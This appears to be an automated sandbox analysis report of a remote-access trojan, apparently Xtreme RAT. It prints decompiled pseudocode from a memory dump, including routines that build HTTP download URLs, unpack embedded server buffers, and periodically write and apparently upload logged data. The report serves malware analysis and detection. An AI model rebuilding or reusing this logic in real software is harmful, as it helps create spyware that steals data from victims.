                  • Opcode ID: f3564a97d53de12c9b48bdf10bff330839f6c1832b8590ef24407a4c5debb447
                  • Instruction ID: 6ae93d5114324f60805c066673cfebbd25bb18d06d828e6891266f46ee2437b0
                  • Opcode Fuzzy Hash: f3564a97d53de12c9b48bdf10bff330839f6c1832b8590ef24407a4c5debb447
                  • Instruction Fuzzy Hash: 71410E38900909ABEB05EF94CD82DDEB7B9EF44281F90C165F500B725EDB71BE058BA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 60%
                  			E100096F6() {
                  				intOrPtr _t11;
                  				intOrPtr _t14;
                  
                  				_push(_t14);
                  				_push(0x1000977a);
                  				_push( *[fs:eax]);
                  				 *[fs:eax] = _t14;
                  				 *0x1000f6cc =  *0x1000f6cc - 1;
                  				if( *0x1000f6cc < 0) {
                  					 *0x1000f68c = RegisterClipboardFormatW(L"jiejwogfdjieovevodnvfnievn");
                  					 *0x1000f690 = RegisterClipboardFormatW(L"gsegtsrgrefsfsfsgrsgrt");
                  					 *0x1000f694 = RegisterClipboardFormatW(L"trhgtehgfsgrfgtrwegtre");
                  					 *0x1000f694 = RegisterClipboardFormatW(L"jytjyegrsfvfbgfsdf");
                  					 *0x1000f69c = RegisterClipboardFormatW(L"hgtrfsgfrsgfgregtregtr");
                  					 *0x1000f6a0 = RegisterClipboardFormatW(L"frgjbfdkbnfsdjbvofsjfrfre");
                  				}
                  				_pop(_t11);
                  				 *[fs:eax] = _t11;
                  				_push(E10009781);
                  				return 0;
			}

                  Instruction addresses: 0x100096fd 0x100096fe 0x10009703 0x10009706 0x10009709 0x10009710 0x1000971c 0x1000972b 0x1000973a 0x10009749 0x10009758 0x10009767 0x10009767 0x1000976e 0x10009771 0x10009774 0x00000000

                  APIs
                  • RegisterClipboardFormatW.USER32(jiejwogfdjieovevodnvfnievn), ref: 10009717
                  • RegisterClipboardFormatW.USER32(gsegtsrgrefsfsfsgrsgrt), ref: 10009726
                  • RegisterClipboardFormatW.USER32(trhgtehgfsgrfgtrwegtre), ref: 10009735
                  • RegisterClipboardFormatW.USER32(jytjyegrsfvfbgfsdf), ref: 10009744
                  • RegisterClipboardFormatW.USER32(hgtrfsgfrsgfgregtregtr), ref: 10009753
                  • RegisterClipboardFormatW.USER32(frgjbfdkbnfsdjbvofsjfrfre), ref: 10009762
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: ClipboardFormatRegister
                  • String ID: frgjbfdkbnfsdjbvofsjfrfre$gsegtsrgrefsfsfsgrsgrt$hgtrfsgfrsgfgregtregtr$jiejwogfdjieovevodnvfnievn$jytjyegrsfvfbgfsdf$trhgtehgfsgrfgtrwegtre
                  • API String ID: 1228543026-2672052065
                  • Opcode ID: eaca480185e3529857f08a7b99fa4587865511e38ce0a633c86f9ec4ba4854cf
                  • Instruction ID: ed3f77de684bd0d246fe2b552f76a464aac7a3f76a0323551fd1ca8e49655e55
                  • Opcode Fuzzy Hash: eaca480185e3529857f08a7b99fa4587865511e38ce0a633c86f9ec4ba4854cf
                  • Instruction Fuzzy Hash: 8BF0F9794192116EF701DF714C6697B7698E7453C13818529F5C882A3DDF3358059BE1
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 60%
                  			E100096F8() {
                  				intOrPtr _t11;
                  				intOrPtr _t14;
                  
                  				_push(_t14);
                  				_push(0x1000977a);
                  				_push( *[fs:eax]);
                  				 *[fs:eax] = _t14;
                  				 *0x1000f6cc =  *0x1000f6cc - 1;
                  				if( *0x1000f6cc < 0) {
                  					 *0x1000f68c = RegisterClipboardFormatW(L"jiejwogfdjieovevodnvfnievn");
                  					 *0x1000f690 = RegisterClipboardFormatW(L"gsegtsrgrefsfsfsgrsgrt");
                  					 *0x1000f694 = RegisterClipboardFormatW(L"trhgtehgfsgrfgtrwegtre");
                  					 *0x1000f694 = RegisterClipboardFormatW(L"jytjyegrsfvfbgfsdf");
                  					 *0x1000f69c = RegisterClipboardFormatW(L"hgtrfsgfrsgfgregtregtr");
                  					 *0x1000f6a0 = RegisterClipboardFormatW(L"frgjbfdkbnfsdjbvofsjfrfre");
                  				}
                  				_pop(_t11);
                  				 *[fs:eax] = _t11;
                  				_push(E10009781);
                  				return 0;
			}

                  Instruction addresses: 0x100096fd 0x100096fe 0x10009703 0x10009706 0x10009709 0x10009710 0x1000971c 0x1000972b 0x1000973a 0x10009749 0x10009758 0x10009767 0x10009767 0x1000976e 0x10009771 0x10009774 0x00000000

                  APIs
                  • RegisterClipboardFormatW.USER32(jiejwogfdjieovevodnvfnievn), ref: 10009717
                  • RegisterClipboardFormatW.USER32(gsegtsrgrefsfsfsgrsgrt), ref: 10009726
                  • RegisterClipboardFormatW.USER32(trhgtehgfsgrfgtrwegtre), ref: 10009735
                  • RegisterClipboardFormatW.USER32(jytjyegrsfvfbgfsdf), ref: 10009744
                  • RegisterClipboardFormatW.USER32(hgtrfsgfrsgfgregtregtr), ref: 10009753
                  • RegisterClipboardFormatW.USER32(frgjbfdkbnfsdjbvofsjfrfre), ref: 10009762
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: ClipboardFormatRegister
                  • String ID: frgjbfdkbnfsdjbvofsjfrfre$gsegtsrgrefsfsfsgrsgrt$hgtrfsgfrsgfgregtregtr$jiejwogfdjieovevodnvfnievn$jytjyegrsfvfbgfsdf$trhgtehgfsgrfgtrwegtre
                  • API String ID: 1228543026-2672052065
                  • Opcode ID: 0db88cb41446c7a1772992425046f1e51f35a21a88b435333acbf191ec07eeb4
                  • Instruction ID: 4cd3ad10a4a29e5a40757261822789eba1ab52c8d76854998792a07700413263
                  • Opcode Fuzzy Hash: 0db88cb41446c7a1772992425046f1e51f35a21a88b435333acbf191ec07eeb4
                  • Instruction Fuzzy Hash: EDF0F4B94192116EF701DFB18C6A97B7A98E7453C13818529E6C882A3DDF331405ABE2
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 96%
                  			E10005838(WCHAR* __eax, intOrPtr* __edx) {
                  				short _t7;
                  				short _t8;
                  				WCHAR* _t9;
                  				short _t11;
                  				WCHAR* _t13;
                  				short _t16;
                  				WCHAR* _t17;
                  				short _t19;
                  				WCHAR* _t21;
                  				WCHAR* _t24;
                  				WCHAR* _t25;
                  				signed int _t28;
                  				signed int _t29;
                  				signed int _t34;
                  				signed int _t35;
                  				WCHAR* _t36;
                  				intOrPtr _t37;
                  				intOrPtr* _t38;
                  				signed int _t39;
                  				signed int _t40;
                  
                  				_t38 = __edx;
                  				_t24 = __eax;
                  				while(1) {
                  					L2:
                  					_t7 =  *_t24;
                  					if(_t7 != 0 && _t7 <= 0x20) {
                  						_t24 = CharNextW(_t24);
                  					}
                  					L2:
                  					_t7 =  *_t24;
                  					if(_t7 != 0 && _t7 <= 0x20) {
                  						_t24 = CharNextW(_t24);
                  					}
                  					L4:
                  					if( *_t24 != 0x22 || _t24[1] != 0x22) {
                  						_t40 = 0;
                  						_t36 = _t24;
                  						while(1) {
                  							_t8 =  *_t24;
                  							if(_t8 <= 0x20) {
                  								break;
                  							}
                  							if(_t8 != 0x22) {
                  								_t9 = CharNextW(_t24);
                  								_t28 = _t9 - _t24;
                  								_t29 = _t28 >> 1;
                  								if(_t28 < 0) {
                  									asm("adc edx, 0x0");
                  								}
                  								_t40 = _t40 + _t29;
                  								_t24 = _t9;
                  								continue;
                  							}
                  							_t24 = CharNextW(_t24);
                  							while(1) {
                  								_t11 =  *_t24;
                  								if(_t11 == 0 || _t11 == 0x22) {
                  									break;
                  								}
                  								_t13 = CharNextW(_t24);
                  								_t34 = _t13 - _t24;
                  								_t35 = _t34 >> 1;
                  								if(_t34 < 0) {
                  									asm("adc edx, 0x0");
                  								}
                  								_t40 = _t40 + _t35;
                  								_t24 = _t13;
                  							}
                  							if( *_t24 != 0) {
                  								_t24 = CharNextW(_t24);
                  							}
                  						}
                  						E10003BE4(_t38, _t40);
                  						_t25 = _t36;
                  						_t37 =  *_t38;
                  						_t39 = 0;
                  						while(1) {
                  							_t16 =  *_t25;
                  							if(_t16 <= 0x20) {
                  								break;
                  							}
                  							if(_t16 != 0x22) {
                  								_t17 = CharNextW(_t25);
                  								if(_t17 <= _t25) {
                  									continue;
                  								} else {
                  									goto L31;
                  								}
                  								do {
                  									L31:
                  									 *((short*)(_t37 + _t39 * 2)) =  *_t25;
                  									_t25 =  &(_t25[1]);
                  									_t39 = _t39 + 1;
                  								} while (_t17 > _t25);
                  								continue;
                  							}
                  							_t25 = CharNextW(_t25);
                  							while(1) {
                  								_t19 =  *_t25;
                  								if(_t19 == 0 || _t19 == 0x22) {
                  									break;
                  								}
                  								_t21 = CharNextW(_t25);
                  								if(_t21 <= _t25) {
                  									continue;
                  								} else {
                  									goto L25;
                  								}
                  								do {
                  									L25:
                  									 *((short*)(_t37 + _t39 * 2)) =  *_t25;
                  									_t25 =  &(_t25[1]);
                  									_t39 = _t39 + 1;
                  								} while (_t21 > _t25);
                  							}
                  							if( *_t25 != 0) {
                  								_t25 = CharNextW(_t25);
                  							}
                  						}
                  						return _t25;
                  					} else {
                  						_t24 =  &(_t24[2]);
                  						continue;
                  					}
                  				}
			}

                  Instruction addresses: 0x1000583c 0x1000583e 0x1000584a 0x1000584a 0x1000584a 0x10005850 0x10005848 0x10005848 0x1000584a 0x1000584a 0x10005850 0x10005848 0x10005848 0x10005858 0x1000585c 0x1000586a 0x1000586c 0x100058c8 0x100058c8 0x100058cf 0x00000000 0x00000000 0x10005874 0x100058b4 0x100058bb 0x100058bd 0x100058bf 0x100058c1 0x100058c1 0x100058c4 0x100058c6 0x00000000 0x100058c6 0x1000587c 0x10005895 0x10005895 0x1000589b 0x00000000 0x00000000 0x10005881 0x10005888 0x1000588a 0x1000588c 0x1000588e 0x1000588e 0x10005891 0x10005893 0x10005893 0x100058a7 0x100058af 0x100058af 0x100058a7 0x100058d5 0x100058da 0x100058dc 0x100058de 0x10005942 0x10005942 0x10005949 0x00000000 0x00000000 0x100058e6 0x1000592a 0x10005931 0x00000000 0x00000000 0x00000000 0x00000000 0x10005933 0x10005933 0x10005936 0x1000593a 0x1000593d 0x1000593e 0x00000000 0x10005933 0x100058ee 0x1000590b 0x1000590b 0x10005911 0x00000000 0x00000000 0x100058f3 0x100058fa 0x00000000 0x00000000 0x00000000 0x00000000 0x100058fc 0x100058fc 0x100058ff 0x10005903 0x10005906 0x10005907 0x100058fc 0x1000591d 0x10005925 0x10005925 0x1000591d 0x10005951 0x10005865 0x10005865 0x00000000 0x10005865 0x1000585c

                  APIs
                  • CharNextW.USER32(00000000,?,00000000,00000001,?,1000599D,1000F834,?,?,1000D14C,00008007,00000000,1000D759), ref: 10005877
                  • CharNextW.USER32(00000000,00000000,?,00000000,00000001,?,1000599D,1000F834,?,?,1000D14C,00008007,00000000,1000D759), ref: 10005881
                  • CharNextW.USER32(00000000,00000000,?,00000000,00000001,?,1000599D,1000F834,?,?,1000D14C,00008007,00000000,1000D759), ref: 100058AA
                  • CharNextW.USER32(00000000,?,00000000,00000001,?,1000599D,1000F834,?,?,1000D14C,00008007,00000000,1000D759), ref: 100058B4
                  • CharNextW.USER32(00000000,00000000,?,00000000,00000001,?,1000599D,1000F834,?,?,1000D14C,00008007,00000000,1000D759), ref: 100058E9
                  • CharNextW.USER32(00000000,00000000,00000000,?,00000000,00000001,?,1000599D,1000F834,?,?,1000D14C,00008007,00000000,1000D759), ref: 100058F3
                  • CharNextW.USER32(00000000,00000000,00000000,?,00000000,00000001,?,1000599D,1000F834,?,?,1000D14C,00008007,00000000,1000D759), ref: 10005920
                  • CharNextW.USER32(00000000,00000000,?,00000000,00000001,?,1000599D,1000F834,?,?,1000D14C,00008007,00000000,1000D759), ref: 1000592A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: CharNext
                  • String ID: "$"
                  • API String ID: 3213498283-3758156766
                  • Opcode ID: 56db7724e89b489fdf42acb8acbc4d14fc1821fe57b6b69609cfd9fea17b0585
                  • Instruction ID: 49fe6b66c80159b6a372ae54facb011d0530469a5cfb0b84791d945b4afab074
                  • Opcode Fuzzy Hash: 56db7724e89b489fdf42acb8acbc4d14fc1821fe57b6b69609cfd9fea17b0585
                  • Instruction Fuzzy Hash: EA31E74D70031795FB20FA649CC025B72D5EB452D3BA6C931ED41A728EEDB25C438369
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 70%
                  			E1000A54F(void* __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, void* __eflags) {
                  				char _v4;
                  				void* _v8;
                  				char _v9;
                  				intOrPtr _v12;
                  				char _v16;
                  				char _v20;
                  				char _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v2516;
                  				intOrPtr _v2520;
                  				char _v4960;
                  				char _v5040;
                  				void _v5044;
                  				char _v5048;
                  				char _v5052;
                  				intOrPtr _v5056;
                  				char _v5060;
                  				char _v5064;
                  				char _v5068;
                  				char _v5072;
                  				char _v5076;
                  				char _v5080;
                  				char _v5084;
                  				void* _t107;
                  				void* _t146;
                  				void* _t151;
                  				intOrPtr _t161;
                  				void* _t181;
                  				void* _t186;
                  				void* _t210;
                  				WCHAR* _t230;
                  				char* _t231;
                  				intOrPtr _t246;
                  				intOrPtr _t250;
                  				char _t251;
                  				intOrPtr _t254;
                  				void* _t264;
                  				char* _t265;
                  				char _t278;
                  				void* _t279;
                  				char* _t280;
                  				intOrPtr _t293;
                  				intOrPtr* _t298;
                  				signed int _t299;
                  				void* _t300;
                  				void* _t301;
                  
                  				_t297 = __esi;
                  				_t251 = __edx;
                  				_t102 = __eax;
                  				_push(__eax);
                  				asm("insb");
                  				if(__eflags == 0) {
                  					_t299 =  *(__esi - 0x73) * 0x8b550040;
                  					_push(_t299);
                  					_t300 = _t301;
                  					_t246 = 0x27b;
                  					do {
                  						_push(0);
                  						_push(0);
                  						_t246 = _t246 - 1;
                  					} while (_t246 != 0);
                  					_t2 =  &_v8;
                  					 *_t2 = _t246;
                  					_push(__ebx);
                  					_push(__esi);
                  					_t297 = __eax;
                  					_push( *_t2);
                  					memcpy( &_v5044, __eax, 0x4e4 << 2);
                  					_pop(_t250);
                  					_v12 = _t250;
                  					_v8 = _t251;
                  					E10003C28( &_v8);
                  					_push(_t300);
                  					_push(0x1000a98b);
                  					_push( *[fs:eax]);
                  					 *[fs:eax] = _t301 + 0xc;
                  					E10003770(_v12);
                  					LoadLibraryA("URLMON.DLL");
                  					LoadLibraryA("shell32.dll");
                  					_t102 =  &_v24;
                  				}
                  				E100037D0(_t102, L"XTREME");
                  				_v9 = 0;
                  				_t230 = E1000390C(_v4);
                  				_t107 = E10005CA4(_t230);
                  				_t307 = _t107;
                  				if(_t107 == 0) {
                  					L10:
                  					_t293 = 0x14;
                  					_t231 =  &_v4960;
                  					_t298 =  &_v5040;
                  					do {
                  						E100034B0( &_v5048, 0x3d, _t231);
                  						__eflags = _v5048;
                  						if(_v5048 != 0) {
                  							__eflags =  *_t298;
                  							if( *_t298 > 0) {
                  								_push("http://");
                  								E100034B0( &_v5060, 0x3d, _t231);
                  								_push(_v5060);
                  								_push(0x1000aa2c);
                  								E100035A0();
                  								_t260 = _v5056;
                  								E100038FC( &_v5052, _v5056);
                  								_push(_v5052);
                  								asm("cdq");
                  								E10005CCC( &_v5064, 0x3d, _v5056,  *_t298, _t260);
                  								_push(_v5064);
                  								_push(0x1000aa34);
                  								E10005CCC( &_v5068, 0x3d, _t260, _v2520, _v2516);
                  								_push(_v5068);
                  								_push(L".functions");
                  								E100039EC();
                  								E10003898( &_v5072, E1000390C(_v4));
                  								_push(_v5072);
                  								E10003898( &_v5076, E1000390C(_v16));
                  								_pop(_t264);
                  								_t146 = E10005F88(_v5076, _t231, _t264);
                  								__eflags = _t146 - 1;
                  								if(_t146 != 1) {
                  									DeleteFileW(E1000390C(_v4));
                  								} else {
                  									_t151 = E1000390C(_v4);
                  									_t265 =  &_v24;
                  									_v32 = E10005E30(_t151, _t265);
                  									_v28 = _t265;
                  									__eflags = _v28;
                  									if(__eflags != 0) {
                  										if(__eflags > 0) {
                  											goto L18;
                  										}
                  									} else {
                  										__eflags = _v32;
                  										if(_v32 > 0) {
                  											L18:
                  											E10003BE4( &_v16, E10003FD4(_v32, _v28, 2, 0));
                  											E100050D0(E1000390C(_v16), _v24);
                  											_t161 = E10003B94(L"STARTSERVERBUFFER", _v16);
                  											__eflags = _t161;
                  											if(_t161 > 0) {
                  												__eflags = E10003B94(L"ENDSERVERBUFFER", _v16);
                  												if(__eflags > 0) {
                  													E10003B04( &_v16, 0x11, 1, __eflags);
                  													E10003B04( &_v16, 0xf, E1000391C(_v16) - 0xf, __eflags);
                  													E10006234(_v16, _t231,  &_v5080, _v20, _t298, __eflags);
                  													E100037AC(_v8, _v5080);
                  													_push(L"STARTSERVERBUFFER");
                  													_push( *_v8);
                  													_push(L"ENDSERVERBUFFER");
                  													E100039EC();
                  													E10006234(_v16, _t231,  &_v5084, _v20, _t298, __eflags);
                  													_t278 = _v5084;
                  													E100037D0( &_v16, _t278);
                  													_t181 = E1000391C(_v16);
                  													asm("cdq");
                  													_push(_t278);
                  													_push(_t181 + _t181);
                  													_push(E1000390C(_v16));
                  													_t186 = E1000390C(_v4);
                  													_pop(_t279);
                  													E10005EB4(_t186, _t279);
                  													E10005F1C(_v4, _t231,  &_v5084, _t298);
                  													_v9 = 1;
                  												}
                  											}
                  										}
                  									}
                  								}
                  							}
                  						}
                  						_t298 = _t298 + 4;
                  						_t231 = _t231 + 0x7a;
                  						_t293 = _t293 - 1;
                  						__eflags = _t293;
                  					} while (_t293 != 0);
                  				} else {
                  					SetFileAttributesW(_t230, 0x80);
                  					_t280 =  &_v24;
                  					_v32 = E10005E30(_t230, _t280);
                  					_v28 = _t280;
                  					E10003BE4( &_v16, E10003FD4(_v32, _v28, 2, 0));
                  					E100050D0(E1000390C(_v16), _v24);
                  					E10006234(_v16, _t230,  &_v5044, _v20, _t297, _t307);
                  					E100037D0( &_v16, _v5044);
                  					if(E10003B94(L"STARTSERVERBUFFER", _v16) <= 0) {
                  						L9:
                  						DeleteFileW(E1000390C(_v4));
                  						goto L10;
                  					} else {
                  						_t210 = E10003B94(L"ENDSERVERBUFFER", _v16);
                  						_t309 = _t210;
                  						if(_t210 <= 0) {
                  							goto L9;
                  						} else {
                  							E10005F1C(_v4, _t230,  &_v5044, _t297);
                  							E10003B04( &_v16, 0x11, 1, _t309);
                  							E10003B04( &_v16, 0xf, E1000391C(_v16) - 0xf, _t309);
                  							E100037AC(_v8, _v16);
                  							_v9 = 1;
                  						}
                  					}
                  				}
                  				_pop(_t254);
                  				 *[fs:eax] = _t254;
                  				_push(E1000A992);
                  				E10003788( &_v5084, 6);
                  				E100032F0( &_v5060, 2);
                  				E10003770( &_v5052);
                  				E100032CC( &_v5048);
                  				E10003770( &_v5044);
                  				E10003788( &_v20, 2);
                  				return E10003770( &_v4);
                  			}

                  APIs
                  • LoadLibraryA.KERNEL32(URLMON.DLL,00000000,1000A98B,?,?,?,?,00000000,00000000), ref: 1000A5A8
                  • LoadLibraryA.KERNEL32(shell32.dll,URLMON.DLL,00000000,1000A98B,?,?,?,?,00000000,00000000), ref: 1000A5B2
                  • SetFileAttributesW.KERNEL32(00000000,00000080,shell32.dll,URLMON.DLL,00000000,1000A98B,?,?,?,?,00000000,00000000), ref: 1000A5E7
                  • DeleteFileW.KERNEL32(00000000,00000002,00000000,00000000,00000080,shell32.dll,URLMON.DLL,00000000,1000A98B,?,?,?,?,00000000,00000000), ref: 1000A6BA
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
• Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
• Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
• Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
• Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
• Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: FileLibraryLoad$AttributesDelete
                  • String ID: ENDSERVERBUFFER$STARTSERVERBUFFER$URLMON.DLL$XTREME$shell32.dll
                  • API String ID: 1064610246-2417524110
                  • Opcode ID: 5f286e1d0fd3c37f5beda26e71c0865df4d0ed5b9a9d771c72d972da7527a27b
                  • Instruction ID: 30b3ef76a2a80ae0936852672a2bbee531ad642fb2a80bd77bca9c30e5cd02f7
                  • Opcode Fuzzy Hash: 5f286e1d0fd3c37f5beda26e71c0865df4d0ed5b9a9d771c72d972da7527a27b
                  • Instruction Fuzzy Hash: 7F418D78A141199BEB11DBA4CC82BEFB3B9FF44380F508165F504A728ADB34BE418B64
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 56%
                  			E10009204() {
                  				char _v8;
                  				char _v12;
                  				char _v16;
                  				char _v20;
                  				char _v24;
                  				intOrPtr _t26;
                  				intOrPtr _t28;
                  				intOrPtr _t38;
                  				void* _t39;
                  				void* _t53;
                  				intOrPtr _t57;
                  				void* _t58;
                  				intOrPtr _t59;
                  				intOrPtr _t63;
                  				void* _t65;
                  				intOrPtr _t73;
                  
                  				_push(0);
                  				_push(0);
                  				_push(0);
                  				_push(0);
                  				_push(0);
                  				_push(0x1000937d);
                  				_push( *[fs:eax]);
                  				 *[fs:eax] = _t73;
                  				while(1) {
                  					_t53 = 0;
                  					goto L2;
                  					L2:
                  					Sleep(0x3e8);
                  					_t53 = _t53 + 1;
                  					if(_t53 < ( *0x1000f6bc + 1 + ( *0x1000f6bc + 1) * 4) * 0x3c) {
                  						goto L2;
                  					} else {
                  						_t77 =  *0x1000e0b8;
                  						if( *0x1000e0b8 != 0) {
                  							E10006B14(0x2e, _t53, 0x2e, 0x2d, 0x1000e0b8, 0x1000f6bc,  &_v8);
                  							E10003928( &_v8, 0x2e, L".html", _t77);
                  							_push(E1000390C(_v8));
                  							_t26 =  *0x1000f6ac; // 0x0
                  							_push(E1000390C(_t26));
                  							_t28 =  *0x1000f6b0; // 0x0
                  							_push(E1000390C(_t28));
                  							_t63 =  *0x1000f684; // 0x0
                  							E10003988( &_v12, 0x100093a0, _t63, _t77);
                  							_push(E1000390C(_v12));
                  							_t57 =  *0x1000f6a8; // 0x0
                  							E10003988( &_v16, _t57, 0x100093ac, _t77);
                  							_push(E1000390C(_v16));
                  							_t38 =  *0x1000f6a4; // 0x0
                  							_t39 = E1000390C(_t38);
                  							_pop(_t65);
                  							_pop(_t58);
                  							if(E10008DA4(_t39, _t53, _t58, _t65, 0x1000e0b8, 0x1000f6bc) != 0 &&  *0x1000f6c0 == 1) {
                  								_t80 =  *0x1000f6c1 - 1;
                  								if( *0x1000f6c1 == 1) {
                  									SetFilePointer( *0x1000e0b8, 0, 0, "jjj");
                  									SetEndOfFile( *0x1000e0b8);
                  									 *0x1000f6c4 = 0;
                  									 *0x1000f6c8 = 0;
                  									E10006710( &_v20, _t58, _t65,  *0x1000f6c4,  *0x1000f6c8);
                  									_t59 =  *0x1000f6b4; // 0x0
                  									E10003988( &_v24, _t59, L"SOFTWARE\\", _t80);
                  									E1000577C(0x80000001, _t53, L"LastSize", _v24, 0x1000f6bc, _t80, 2, _v20);
                  								}
                  							}
                  						}
                  						continue;
                  					}
                  				}
                  			}

                  APIs
                  • Sleep.KERNEL32(000003E8,00000000,1000937D,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 10009230
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,000003E8,00000000,1000937D,?,?,?,?,00000000), ref: 100092FD
                  • SetEndOfFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,000003E8,00000000,1000937D), ref: 10009305
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
• Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
• Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
• Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
• Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
• Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: File$PointerSleep
                  • String ID: .html$FTP$LastSize$SOFTWARE\$jjj
                  • API String ID: 1384090385-2221063783
                  • Opcode ID: f64d9703497d1778a1f724dcd6172282dd11fce0a9d43a36a9a9269ada9e7162
                  • Instruction ID: 1ef3a85e4ac3c80801a06b688fa0acd6d065186ae52865efd5065228073e7574
                  • Opcode Fuzzy Hash: f64d9703497d1778a1f724dcd6172282dd11fce0a9d43a36a9a9269ada9e7162
                  • Instruction Fuzzy Hash: 9F317078500145BFF705DB64CD81BAF77ADEB453C0F904129F440AB6BACBB2AD509B61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 58%
                  			E10005A94(char __eax, void* __ebx, void* __ecx) {
                  				char _v8;
                  				intOrPtr _t52;
                  				intOrPtr _t64;
                  
                  				_v8 = __eax;
                  				E10003C28( &_v8);
                  				_push(_t64);
                  				_push(0x10005b87);
                  				_push( *[fs:eax]);
                  				 *[fs:eax] = _t64;
                  				E10003A34(_v8, L"HKEY_CLASSES_ROOT");
                  				if(0 != 0) {
                  					E10003A34(_v8, L"HKCR");
                  					if(0 != 0) {
                  						E10003A34(_v8, L"HKEY_CURRENT_USER");
                  						if(__eflags == 0) {
                  							L5:
                  						} else {
                  							E10003A34(_v8, L"HKCU");
                  							if(__eflags != 0) {
                  								E10003A34(_v8, L"HKEY_LOCAL_MACHINE");
                  								if(__eflags == 0) {
                  									L8:
                  								} else {
                  									E10003A34(_v8, L"HKLM");
                  									if(__eflags != 0) {
                  										E10003A34(_v8, L"HKEY_USERS");
                  										if(__eflags == 0) {
                  											L11:
                  										} else {
                  											E10003A34(_v8, 0x10005c60);
                  											if(__eflags != 0) {
                  												E10003A34(_v8, L"HKEY_CURRENT_CONFIG");
                  												if(__eflags == 0) {
                  													L14:
                  												} else {
                  													E10003A34(_v8, L"HKCC");
                  													if(__eflags == 0) {
                  														goto L14;
                  													}
                  												}
                  											} else {
                  												goto L11;
                  											}
                  										}
                  									} else {
                  										goto L8;
                  									}
                  								}
                  							} else {
                  								goto L5;
                  							}
                  						}
                  					} else {
                  						goto L2;
                  					}
                  				}
                  				_pop(_t52);
                  				 *[fs:eax] = _t52;
                  				_push(E10005B8E);
                  				return E10003770( &_v8);
                  			}

                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
• Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
• Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
• Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
• Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
• Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: AllocString
                  • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                  • API String ID: 2525500382-909552448
                  • Opcode ID: 19a7d89fdd0d4a8943666261cc10e3fb7835feb1d7da3395f8e32f4d42fefbdb
                  • Instruction ID: 07abd4759daa604870a4f77bd8534178fed91fd4fee8f89ff290bb29f67fd9b2
